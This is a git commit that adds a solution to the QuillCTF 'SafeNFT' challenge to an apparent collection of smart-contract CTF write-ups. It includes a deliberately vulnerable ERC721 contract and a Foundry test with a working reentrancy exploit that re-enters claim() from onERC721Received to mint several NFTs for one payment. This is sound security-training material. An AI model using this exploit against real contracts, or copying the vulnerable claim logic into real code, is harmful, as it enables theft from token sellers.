Add solution for QuillCTF 2022 - Challenge 4 (SafeNFT) (minaminao#8)

PraneshASP · web-flow · commit 77766e535d09 · 2023-02-18T00:38:26.000+09:00
thank you ~
diff --git a/README.md b/README.md
@@ -51,10 +51,10 @@ If there are any incorrect descriptions, I would appreciate it if you could let
   - [Faking errors](#faking-errors)
   - [Foundry cheatcodes](#foundry-cheatcodes)
   - [Front-running](#front-running)
-  - [Head overflow bug in calldata tuple ABI-reencoding (< Solidity 0.8.16)](#head-overflow-bug-in-calldata-tuple-abi-reencoding--solidity-0816)
-  - [Arbitrary storage overwriting by setting an array length to `2^256-1` (< Solidity 0.6.0)](#arbitrary-storage-overwriting-by-setting-an-array-length-to-2256-1--solidity-060)
-  - [Constructor that is just a function by a typo (< Solidity 0.5.0)](#constructor-that-is-just-a-function-by-a-typo--solidity-050)
-  - [Storage overwrite via uninitialized storage pointer (< Solidity 0.5.0)](#storage-overwrite-via-uninitialized-storage-pointer--solidity-050)
+  - [Head overflow bug in calldata tuple ABI-reencoding (\< Solidity 0.8.16)](#head-overflow-bug-in-calldata-tuple-abi-reencoding--solidity-0816)
+  - [Arbitrary storage overwriting by setting an array length to `2^256-1` (\< Solidity 0.6.0)](#arbitrary-storage-overwriting-by-setting-an-array-length-to-2256-1--solidity-060)
+  - [Constructor that is just a function by a typo (\< Solidity 0.5.0)](#constructor-that-is-just-a-function-by-a-typo--solidity-050)
+  - [Storage overwrite via uninitialized storage pointer (\< Solidity 0.5.0)](#storage-overwrite-via-uninitialized-storage-pointer--solidity-050)
   - [Other ad-hoc vulnerabilities and methods](#other-ad-hoc-vulnerabilities-and-methods)
 - [Bitcoin](#bitcoin)
   - [Bitcoin basics](#bitcoin-basics)
@@ -300,6 +300,8 @@ Note:
 | [EthernautDAO: 4. VendingMachine](src/EthernautDAO/VendingMachine/)             | `call`                     |
 | [DeFi-Security-Summit-Stanford: InsecureDexLP](src/DeFiSecuritySummitStanford/) | ERC-223, `tokenFallback()` |
 | [MapleCTF 2022: maplebacoin](src/MapleCTF/)                                     |                            |
+| [QuillCTF 2023: SafeNFT](src/QuillCTF2022/SafeNFT)                              | ERC721, `safeMint()`       |
+
 
 ### Flash loan basics
 - Flash loans are uncollateralised loans that allow the borrowing of an asset, as long as the borrowed assets are returned before the end of the transaction. The borrower can deal with the borrowed assets any way they want within the transaction.
diff --git a/lib/forge-std b/lib/forge-std
@@ -1 +1 @@
-Subproject commit f8e700ed5d605f53f2194dc8df05a0bc3a7c1e43
+Subproject commit 83c6e5b7bbbc865a83ed636ad32a8b7f2fc9185e
diff --git a/lib/foundry-huff b/lib/foundry-huff
@@ -1 +1 @@
-Subproject commit 9b77ac446dc68717aea7a31862a24d4e434ec58c
+Subproject commit eb9ea316389e8bd580f92908b8454399401d0316
diff --git a/lib/openzeppelin-contracts b/lib/openzeppelin-contracts
@@ -1 +1 @@
-Subproject commit 1575cc6908f0f38bfb36d459c4ce7295f0f89c49
+Subproject commit d59306bd06a241083841c2e4a39db08e1f3722cc
diff --git a/src/QuillCTF2022/README.md b/src/QuillCTF2022/README.md
@@ -9,6 +9,7 @@ Here's the link to the challenges page: https://quillctf.super.site/challenges.
   - [Road closed:](#road-closed)
   - [VIP Bank:](#vip-bank)
   - [Confidential Hash:](#confidential-hash)
+  - [SafeNFT:](#safenft)
 
 
 ---
@@ -50,3 +51,15 @@ Goerli link: https://goerli.etherscan.io/address/0xf8e9327e38ceb39b1ec3d26f5fad0
 ```
 forge test --match-contract QuillCTF2Solved -vvvv
 ```
+
+## SafeNFT:
+https://quillctf.super.site/challenges/quillctf-challenges/bulletproof-nft
+
+**Objective**:
+Claim multiple NFTs for the price of one.
+
+Goerli Link: https://goerli.etherscan.io/address/0xf0337cde99638f8087c670c80a57d470134c3aae
+
+```
+forge test --match-contract SafeNFTSolved -vvvv
+```
diff --git a/src/QuillCTF2022/SafeNFT/SafeNFTSovled.t.sol b/src/QuillCTF2022/SafeNFT/SafeNFTSovled.t.sol
@@ -0,0 +1,77 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+import "forge-std/Test.sol";
+
+/// ./challenge/SafeNFT.sol
+
+/// Define the interface for the Target contract
+interface ITarget {
+    function buyNFT() external payable;
+
+    function claim() external;
+
+    function balanceOf(address owner) external view returns (uint256);
+}
+
+interface IERC721Receiver {
+    function onERC721Received(
+        address operator,
+        address from,
+        uint256 tokenId,
+        bytes calldata data
+    ) external returns (bytes4);
+}
+
+/// Define the Exploiter contract
+contract Exploiter is IERC721Receiver {
+    ITarget public immutable target;
+
+    constructor(ITarget _target) payable {
+        target = _target;
+    }
+
+    function payForOneNFT() public {
+        target.buyNFT{value: 0.01 ether}();
+    }
+
+    function exploit() public {
+        target.claim();
+    }
+
+    function onERC721Received(
+        address operator,
+        address from,
+        uint256 tokenId,
+        bytes calldata data
+    ) external override returns (bytes4) {
+        /// Reentrancy attack: Call claim until we mint multiple NFTs for the price of 1
+        if (target.balanceOf(address(this)) < 2) target.claim();
+
+        return IERC721Receiver.onERC721Received.selector;
+    }
+}
+
+contract SafeNFTSolved is Test {
+    ITarget target = ITarget(0xf0337Cde99638F8087c670c80a57d470134C3AAE);
+    Exploiter exploiter;
+
+    function setUp() public {
+        /// Run the test against the goerli testnet fork
+        vm.createSelectFork("https://rpc.ankr.com/eth_goerli", 8168379);
+
+        /// Deploy the exploiter contract with 2 ether (any amount more than 0.1 ether will work)
+        exploiter = new Exploiter{value: 2 ether}(target);
+    }
+
+    function test_exploit() external {
+        uint256 balanceETHBefore = address(exploiter).balance;
+        exploiter.payForOneNFT();
+        exploiter.exploit();
+        uint256 balanceETHAfter = address(exploiter).balance;
+
+        /// Objective: Exploiter should mint more than 1 NFT for the price of 1
+        assertGt(target.balanceOf(address(exploiter)), 1);
+        assertEq(balanceETHBefore - balanceETHAfter, 0.01 ether);
+    }
+}
diff --git a/src/QuillCTF2022/SafeNFT/challenge/SafeNFT.sol b/src/QuillCTF2022/SafeNFT/challenge/SafeNFT.sol
@@ -0,0 +1,29 @@
+// SPDX-License-Identifier: UNLICENSED
+
+pragma solidity 0.8.7;
+
+import "openzeppelin-contracts/contracts/token/ERC721/extensions/ERC721Enumerable.sol";
+
+contract SafeNFT is ERC721Enumerable {
+    uint256 price;
+    mapping(address => bool) public canClaim;
+
+    constructor(
+        string memory tokenName,
+        string memory tokenSymbol,
+        uint256 _price
+    ) ERC721(tokenName, tokenSymbol) {
+        price = _price; //price = 0.01 ETH
+    }
+
+    function buyNFT() external payable {
+        require(price == msg.value, "INVALID_VALUE");
+        canClaim[msg.sender] = true;
+    }
+
+    function claim() external {
+        require(canClaim[msg.sender], "CANT_MINT");
+        _safeMint(msg.sender, totalSupply());
+        canClaim[msg.sender] = false;
+    }
+}
